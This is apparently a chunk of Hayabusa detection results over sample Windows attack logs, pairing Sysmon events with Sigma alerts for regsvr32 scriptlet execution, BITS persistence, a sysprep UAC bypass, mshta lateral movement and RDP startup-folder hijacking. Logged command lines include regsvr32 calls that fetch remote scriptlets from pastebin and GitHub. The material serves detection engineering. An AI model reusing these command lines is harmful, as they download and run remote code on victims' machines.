+2019-05-13 02:20:31.183 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.443 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,rules/sigma/process_creation/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.458 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 03:04:50.121 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.780 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:06.562 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:48:52.219 +09:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
+2019-05-13 03:48:52.766 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
+2019-05-13 23:50:59.389 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
+2019-05-14 03:02:49.160 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 365ABB72-B147-5CD9-0000-00109D4F0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.895 +09:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 365ABB72-B167-5CD9-0000-00109D240C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:21.212 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:05:18.692 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 09:29:52.744 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
+2019-05-14 09:32:22.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
+2019-05-14 09:32:36.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:05.534 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.143 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 365ABB72-28D3-5CDA-0000-0010B08B1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 365ABB72-28D3-5CDA-0000-001055AD1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.814 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 23:03:45.100 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-14 23:04:06.339 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-14 23:04:28.860 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
